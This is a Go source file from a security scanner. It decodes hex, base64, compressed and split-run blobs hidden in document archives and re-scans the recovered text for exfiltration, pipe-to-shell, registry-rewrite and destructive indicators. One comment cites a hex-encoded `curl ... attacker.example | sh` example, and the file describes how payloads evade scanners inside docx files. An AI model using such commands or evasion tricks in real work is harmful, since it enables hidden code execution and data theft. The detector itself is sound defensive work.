File size: 12,356 Bytes
d2507b5 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 | package bundle
import (
"bytes"
"compress/gzip"
"compress/zlib"
"encoding/base64"
"encoding/hex"
"io"
"regexp"
"strings"
)
// decode.go closes the docx-indirection evasion: an obfuscated payload (hex,
// base64, gzip/zlib+base64, or split-across-runs) buried in an archive member or
// data file is flagged only as an opaque "embedded-encoded-blob" by the shape
// scanners. That structural-only signal does NOT escalate under the precision
// gate, so a skill that hex-encodes `curl ... attacker.example | sh` inside
// docProps/custom.xml slips through. The fix here DECODES the blob (bounded:
// <=~1MiB recovered, <=2 nested layers, never panics) and RE-SCANS the recovered
// bytes with the shared indicator vocabulary. If the recovered content itself
// exhibits a behavioral signal (exfil host, registry rewrite to a non-allowlisted
// host, curl|sh / env-export), we emit a CORROBORATED SevHigh finding so
// aggregate.bundleEscalates fires. Mere decodability is never enough — only a
// behavioral hit in the recovered bytes corroborates (benign base64 assets and
// hashes stay SevMedium structural).
const (
// maxDecodedBytes caps the recovered payload fed back into the scanner. Mirrors
// the archive per-member budget so a decode bomb can never blow past it.
maxDecodedBytes = maxMemberScanBytes // 1 MiB
// maxDecodeDepth bounds nested decode layers. gzip+base64 is 2 layers; this is
// the ceiling so a base64(base64(gzip(...))) chain cannot recurse unbounded.
maxDecodeDepth = 2
// minBlobLen is the smallest candidate blob worth decoding. Below this the
// shared regexes would not have matched anyway; it bounds wasted work.
minBlobLen = 16
)
// splitRunsRe extracts the concatenated payload from the docx "split across XML
// runs" obfuscation: <<PART1>>a<<PART2>>b<<PART3>>c<<END>>. The parts are joined
// (markers stripped) to reconstruct the plaintext payload. Bounded, non-greedy.
var splitRunsRe = regexp.MustCompile(`(?s)<<PART\d+>>(.*?)<<END>>`)
// partMarkerRe strips the inter-part markers so the concatenated payload reads as
// the original plaintext.
var partMarkerRe = regexp.MustCompile(`<<PART\d+>>`)
// decodeAndRescan inspects text for obfuscated-payload carriers (hex, base64,
// gzip/zlib+base64, split-runs), decodes any it finds (bounded + panic-safe), and
// re-runs sharedIndicatorScan over the recovered bytes. For each candidate whose
// RECOVERED content exhibits a behavioral signal it returns a single corroborated
// SevHigh Finding (decoded-blob-exfil / decoded-registry-rewrite /
// decoded-blob-rce). Benign-but-decodable blobs (no behavioral hit) yield nothing
// here — the caller's existing SevMedium structural "embedded-encoded-blob" stands.
//
// fileRel labels the findings; analyzer is the owning analyzer name. line is the
// 1-based line the carrier was found on (0 if unknown), surfaced on the finding.
func decodeAndRescan(text string, fileRel string, analyzer string, line int) []Finding {
// Defense in depth: recover from any pathological decode so a single corrupt
// blob can never crash a scan (the analyzers run under safeAnalyze too).
defer func() { _ = recover() }()
var out []Finding
for _, cand := range extractEncodedCandidates(text) {
recovered, ok := decodeBounded(cand, 0)
if !ok || len(recovered) == 0 {
continue
}
recText := string(recovered)
// Re-scan recovered bytes with the full shared vocabulary. decode=false:
// the bounded multi-layer decode is handled here in decode.go, so the
// scanner must not re-trigger another decode pass (recursion guard).
sub := sharedIndicatorScanInner(recText, fileRel, analyzer, false)
sig, detail, hit := classifyRecovered(sub, recText)
if !hit {
continue
}
out = append(out, Finding{
Analyzer: analyzer,
File: fileRel,
Signal: sig,
Severity: SevHigh,
Detail: detail,
Line: line,
Corroborated: true,
})
}
return dedupeFindings(out)
}
// classifyRecovered inspects the findings produced by re-scanning recovered bytes
// (and the recovered text itself for registry-rewrite directives) and decides
// whether a behavioral signal is present. Returns the decoded-* signal name, a
// human detail, and whether a hit occurred.
func classifyRecovered(sub []Finding, recText string) (signal, detail string, hit bool) {
var sawExfil, sawRegistry, sawRCE bool
for _, f := range sub {
switch f.Signal {
case "exfil-host-reference":
sawExfil = true
case "registry-rewrite":
// Only a non-downgraded (SevHigh+) registry rewrite corroborates; a
// known-benign mirror is lowered to SevLow by sharedIndicatorScan.
if f.Severity >= SevHigh {
sawRegistry = true
}
case "remote-code-execution", "exfil-env-to-network", "destructive-command":
sawRCE = true
}
}
switch {
case sawExfil:
return "decoded-blob-exfil", "decoded an obfuscated payload that references a known exfiltration host", true
case sawRegistry:
return "decoded-registry-rewrite", "decoded an obfuscated payload that rewrites a package-manager registry/index to a non-allowlisted host", true
case sawRCE:
return "decoded-blob-rce", "decoded an obfuscated payload that pipes-to-shell or exfiltrates environment/credentials", true
default:
return "", "", false
}
}
// extractEncodedCandidates pulls decode candidates out of a text block. It
// returns: each base64 blob match, each hex blob match, and (if present) the
// reassembled split-runs payload. Candidates are deduped and length-bounded.
func extractEncodedCandidates(text string) []string {
seen := make(map[string]bool)
var cands []string
add := func(s string) {
s = strings.TrimSpace(s)
if len(s) < minBlobLen || seen[s] {
return
}
seen[s] = true
cands = append(cands, s)
}
// split-runs: reassemble the parts (markers removed) into the plaintext payload.
for _, m := range splitRunsRe.FindAllStringSubmatch(text, 8) {
if len(m) < 2 {
continue
}
joined := partMarkerRe.ReplaceAllString(m[1], "")
add(joined)
}
// base64 / hex blobs. Cap the number of candidates so a file packed with
// thousands of short blobs cannot blow up the work.
for _, m := range base64BlobRe.FindAllString(text, 64) {
add(m)
}
for _, m := range longHexRe.FindAllString(text, 64) {
add(m)
}
return cands
}
// decodeBounded attempts to decode a single candidate string into recovered bytes,
// trying hex, base64, and (on the decoded result) gzip/zlib decompression. depth
// bounds nested decode layers (gzip+base64 = 2). It never panics and returns
// ok=false when nothing plausibly decoded. Recovered output is capped at
// maxDecodedBytes.
func decodeBounded(s string, depth int) (recovered []byte, ok bool) {
if depth > maxDecodeDepth {
return nil, false
}
s = strings.TrimSpace(s)
if len(s) < minBlobLen {
return nil, false
}
// split-runs payloads arrive here already reassembled and may BE the plaintext
// (the most common docx case): if the raw candidate already carries a
// behavioral marker, surface it directly without requiring a transform.
if depth == 0 && looksBehavioral(s) {
return capBytes([]byte(s)), true
}
// Try hex first (hex alphabet is a strict subset of base64's, so a pure-hex
// blob would also "succeed" as base64 and yield garbage — prefer hex).
if dec, hexOk := tryHex(s); hexOk {
if out, refined := refineDecoded(dec, depth); refined {
return out, true
}
}
// Then base64 (covers base64 and gzip/zlib+base64 via refineDecoded).
if dec, b64Ok := tryBase64(s); b64Ok {
if out, refined := refineDecoded(dec, depth); refined {
return out, true
}
}
return nil, false
}
// refineDecoded takes raw decoded bytes and either (a) decompresses them if they
// are gzip/zlib, recursing one decode layer deeper, or (b) returns them directly
// when they already look like a behavioral payload (or recurses on a still-encoded
// inner blob). Returns ok=true only when the final bytes look meaningful.
func refineDecoded(dec []byte, depth int) (recovered []byte, ok bool) {
if len(dec) == 0 {
return nil, false
}
// gzip / zlib magic -> decompress, then recurse one layer on the result.
if decompressed, decOk := tryDecompress(dec); decOk {
if looksBehavioral(string(decompressed)) {
return capBytes(decompressed), true
}
// The decompressed bytes might themselves be a further-encoded blob.
if inner, innerOk := decodeBounded(string(decompressed), depth+1); innerOk {
return inner, true
}
// Decompressed to text that isn't behavioral and isn't a nested blob.
return capBytes(decompressed), looksTexty(decompressed)
}
// Not compressed: accept if the decoded bytes look like a behavioral payload.
if looksBehavioral(string(dec)) {
return capBytes(dec), true
}
// Decoded to text that may carry a still-encoded inner blob (e.g. base64 of
// base64). Recurse one layer.
if looksTexty(dec) {
if inner, innerOk := decodeBounded(string(dec), depth+1); innerOk {
return inner, true
}
// Plain decoded text with no behavioral marker: return it so the caller's
// re-scan can make the final SevHigh decision (keeps the decision in one place).
return capBytes(dec), true
}
return nil, false
}
// looksBehavioral is a cheap pre-filter: does the text carry any marker the
// re-scan would act on? Avoids returning megabytes of benign decoded asset bytes
// for a full re-scan when there is plainly nothing actionable.
func looksBehavioral(text string) bool {
if exfilHostRe.MatchString(text) {
return true
}
low := strings.ToLower(text)
return matchedAny(low, rceTerms) ||
matchedAny(low, destructiveTerms) ||
matchedAny(low, registryRewriteTerms) ||
matchedAny(low, networkSinkTerms)
}
// tryHex decodes an optionally-0x-prefixed hex string. Requires an even length
// and a strict hex alphabet so arbitrary base64 is not mis-decoded as hex.
func tryHex(s string) ([]byte, bool) {
s = strings.TrimPrefix(strings.TrimPrefix(s, "0x"), "0X")
if len(s) < minBlobLen || len(s)%2 != 0 {
return nil, false
}
for i := 0; i < len(s); i++ {
c := s[i]
if !((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || (c >= 'A' && c <= 'F')) {
return nil, false
}
}
dec, err := hex.DecodeString(s)
if err != nil {
return nil, false
}
return capBytes(dec), true
}
// tryBase64 decodes standard or URL-safe base64 (with or without padding).
func tryBase64(s string) ([]byte, bool) {
for _, enc := range []*base64.Encoding{
base64.StdEncoding, base64.RawStdEncoding,
base64.URLEncoding, base64.RawURLEncoding,
} {
if dec, err := enc.DecodeString(s); err == nil && len(dec) > 0 {
return capBytes(dec), true
}
}
return nil, false
}
// tryDecompress decompresses gzip or zlib data, bounded by maxDecodedBytes. It
// never panics and returns ok=false for non-compressed input.
func tryDecompress(data []byte) ([]byte, bool) {
// gzip magic 1f 8b
if len(data) >= 2 && data[0] == 0x1f && data[1] == 0x8b {
zr, err := gzip.NewReader(bytes.NewReader(data))
if err != nil {
return nil, false
}
defer zr.Close()
out, err := io.ReadAll(io.LimitReader(zr, maxDecodedBytes+1))
if err != nil && len(out) == 0 {
return nil, false
}
return capBytes(out), len(out) > 0
}
// zlib magic: 0x78 followed by 0x01/0x9c/0xda (common) — let the reader judge.
if len(data) >= 2 && data[0] == 0x78 {
zr, err := zlib.NewReader(bytes.NewReader(data))
if err != nil {
return nil, false
}
defer zr.Close()
out, err := io.ReadAll(io.LimitReader(zr, maxDecodedBytes+1))
if err != nil && len(out) == 0 {
return nil, false
}
return capBytes(out), len(out) > 0
}
return nil, false
}
// looksTexty reports whether decoded bytes are plausibly text (so re-scanning /
// further-decoding them is worthwhile). Rejects mostly-binary blobs to avoid
// scanning random decoded asset bytes.
func looksTexty(data []byte) bool {
if len(data) == 0 {
return false
}
printable := 0
n := len(data)
if n > 4096 {
n = 4096
}
for i := 0; i < n; i++ {
c := data[i]
if c == '\t' || c == '\n' || c == '\r' || (c >= 0x20 && c < 0x7f) {
printable++
}
}
return float64(printable)/float64(n) >= 0.85
}
// capBytes truncates recovered bytes to the decode budget.
func capBytes(data []byte) []byte {
if len(data) > maxDecodedBytes {
return data[:maxDecodedBytes]
}
return data
}
|